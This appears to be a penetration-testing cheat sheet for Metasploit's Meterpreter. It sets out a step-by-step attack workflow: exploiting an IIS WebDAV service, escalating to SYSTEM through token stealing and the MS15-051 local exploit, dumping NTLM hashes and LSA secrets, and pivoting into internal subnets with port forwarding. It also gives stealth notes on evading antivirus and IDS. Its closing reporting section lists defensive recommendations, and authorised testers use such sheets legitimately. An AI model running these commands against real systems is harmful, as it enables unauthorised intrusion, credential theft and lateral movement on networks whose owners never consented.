🛡️ Methodology Checklist
- Get Meterpreter session
- Migrate to stable process:
migrate -N [PROCESS_NAME] - Gather sysinfo:
sysinfo; getuid; getpid - Check privileges:
getprivs - Enable all privs:
getsystem - Dump hashes:
hashdump(requires SYSTEM) - Pivot:
run post/multi/manage/autoroute SUBNET=[NET] - Background:
background(Ctrl+Z) - Run post modules:
run post/[MODULE]
🎯 Operational Context
Use when: Post-exploitation on a compromised host — Meterpreter provides encrypted C2, file operations, pivoting, credential dumping, and privilege escalation from a single session.
Think Dumber First: Run sysinfo and getuid immediately after getting a Meterpreter session. Then getsystem to attempt privilege escalation. If that fails, run local_exploit_suggester post module before manual enumeration.
Skip when: Target has EDR with Meterpreter signatures — use a custom C2 or shellcode injector instead.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
getuid | Show current user (whoami equivalent) |
getprivs | List current token privileges |
sysinfo | OS, hostname, architecture |
getpid | Current process ID |
ps | List all running processes |
migrate [PID] | Move Meterpreter into another process |
steal_token [PID] | Impersonate security token of target process |
getsystem | Auto-escalate to NT AUTHORITY\SYSTEM |
hashdump | Dump NTLM hashes from SAM (requires SYSTEM) |
lsa_dump_secrets | Dump LSA secrets (service accounts, default passwords) |
lsa_dump_sam | Alternative SAM hash dump |
ifconfig | Network interface information |
netstat | Active network connections |
portfwd add -l [LPORT] -p [TARGET_PORT] -r [TARGET_IP] | Forward local port to target port |
route add [INTERNAL_NET] [NETMASK] [SESSION_ID] | Add routing through session for pivoting |
upload [FILE] | Upload file to target |
download [FILE] | Download file from target |
edit [FILE] | Edit file (vim-style) on target |
cat [FILE] | Read file on target |
shell | Drop into system CMD/Bash shell |
background | Background session (returns to msf prompt) |
exit | Terminate and close session |
use post/multi/recon/local_exploit_suggester | Find kernel exploits for current session |
set SESSION [ID]; run | Run post module against backgrounded session |
🔬 Deep Dive & Workflow
Architecture — What Makes Meterpreter Stealthy
- DLL Injection — loaded into an existing process via Reflective DLL injection; no new process spawned
- Runs in RAM — no binary written to disk; avoids file-based AV scans
- AES-encrypted channel — network IDS cannot read commands in transit
- Extensible runtime — loads extensions (Mimikatz via
load kiwi, VNC, etc.) over the wire without rebuilding the payload
Scan → SYSTEM Workflow
# 1. Enumerate with db_nmap
db_nmap -sV -p- [TARGET_IP]
# 2. Find and exploit vulnerable service
search iis_webdav_upload_asp
use exploit/windows/iis/iis_webdav_upload_asp
set RHOST [TARGET_IP]; set LHOST tun0
run
# → Meterpreter session 1
# 3. Check identity
meterpreter > getuid
# If access denied or low user:
# 4. Look for a SYSTEM process to migrate into
meterpreter > ps
# Note PID of services.exe, winlogon.exe, etc.
# 5a. Token stealing (if you see SYSTEM processes)
meterpreter > steal_token [PID_OF_SYSTEM_PROC]
meterpreter > getuid
# → NT AUTHORITY\SYSTEM
# 5b. Local exploit suggester (if token stealing fails)
meterpreter > bg
use post/multi/recon/local_exploit_suggester
set SESSION 1; run
# Note suggested exploits
use exploit/windows/local/ms15_051_client_copy_image
set SESSION 1; set LHOST tun0
run
# → New Meterpreter as SYSTEM
# 6. Loot
meterpreter > hashdump
meterpreter > lsa_dump_secretsProcess Migration
migrate <PID> moves the Meterpreter DLL into a different process:
- Stability: If the exploited process is unstable (web request handler), migrate to a stable service like
explorer.exeorsvchost.exe - Privilege: If the target process runs as SYSTEM, migrating there gives SYSTEM access
- Stealth: Moving from
powershell.exe(noisy) tosvchost.exe(expected system traffic)
Pivoting Commands
# Forward port — access internal service through victim
portfwd add -l 3389 -p 3389 -r 172.16.5.15
# Now RDP to 127.0.0.1:3389 → hits 172.16.5.15:3389 through victim
# Route — route all traffic to internal subnet through session
route add 172.16.5.0 255.255.255.0 1
# Session 1 is the gateway to 172.16.5.0/24🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| getsystem fails | No privesc path found automatically | Run run post/multi/recon/local_exploit_suggester for available local exploits |
| Meterpreter session dies after migrate | Target process crashed | Migrate to stable processes: explorer.exe, svchost.exe, spoolsv.exe |
| hashdump returns access denied | Not SYSTEM or admin | Elevate first: getsystem; if fails try bypassuac or token impersonation |
| screenshot/webcam fails | Process not in interactive session | Migrate to a process in Session 1 (user desktop session): ps to find explorer.exe PID |
| Meterpreter response slow | High latency or packet loss | Reduce poll interval: set SessionCommunicationTimeout 300; switch to HTTPS for stability |
📝 Reporting Trigger
Finding Title: Meterpreter Session Provides Full Post-Exploitation Capability Impact: Active Meterpreter session grants encrypted interactive access to the compromised system with credential dumping, pivoting, file system access, keylogging, and privilege escalation capabilities. Root Cause: Initial vulnerability exploited with no EDR capable of detecting Meterpreter session establishment or post-exploitation module execution. Recommendation: Deploy EDR with Meterpreter behavioral signatures. Implement network egress filtering. Alert on LSASS memory access from non-system processes. Patch the exploited vulnerability immediately.